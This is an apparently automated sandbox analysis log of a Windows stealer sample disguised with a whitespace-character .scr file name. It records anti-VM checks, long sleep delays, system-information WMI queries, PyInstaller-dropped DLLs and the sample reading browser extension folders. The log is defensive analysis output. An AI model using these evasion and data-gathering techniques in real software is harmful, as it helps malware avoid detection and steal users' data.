Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4083	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3541	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3324
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 848
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2954
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 597
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 825
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4659
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3229
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2760
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 998

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-time-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-process-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-utility-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-stdio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-locale-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-runtime-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xuxqeuoy\xuxqeuoy.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI17882\python312.dll	Jump to dropped file

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-16942

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

API coverage: 4.9 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5276	Thread sleep count: 4083 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7456	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7136	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5304	Thread sleep count: 3541 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4352	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5292	Thread sleep count: 3324 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7460	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436	Thread sleep count: 848 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7548	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7512	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288	Thread sleep count: 3837 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288	Thread sleep count: 825 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7236	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888	Thread sleep count: 4659 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916	Thread sleep count: 304 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7724	Thread sleep count: 3229 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3440	Thread sleep count: 152 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7584	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676	Thread sleep count: 2760 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2820	Thread sleep count: 998 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7252	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7896	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE27E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	0_2_00007FF73AE27E4C
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE188D0 FindFirstFileExW,FindClose,	0_2_00007FF73AE188D0
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	Code function: 0_2_00007FF73AE31EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF73AE31EE4
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EA46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	68_2_00007FF7F7EA46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7EE88E0 FindFirstFileExA,	68_2_00007FF7F7EE88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI17882\rar.exe	Code function: 68_2_00007FF7F7E9E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	68_2_00007FF7F7E9E21C

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe

Code function: 2_2_00007FF8A86F1490 GetSystemInfo,

2_2_00007FF8A86F1490

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\#U202f#U202f#U2005#U00a0.scr.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af\	Jump to behavior

Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: g#jdfecodevmware
Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000002.2328542790.0000028C87930000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: getmac.exe, 00000031.00000003.2151790983.0000020D5DEAD000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000002.2152634842.0000020D5DEAE000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000031.00000003.2151174026.0000020D5DE93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW!
Source: #U202f#U202f#U2005#U00a0.scr.exe, 00000002.00000003.2320689700.0000028C8876B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
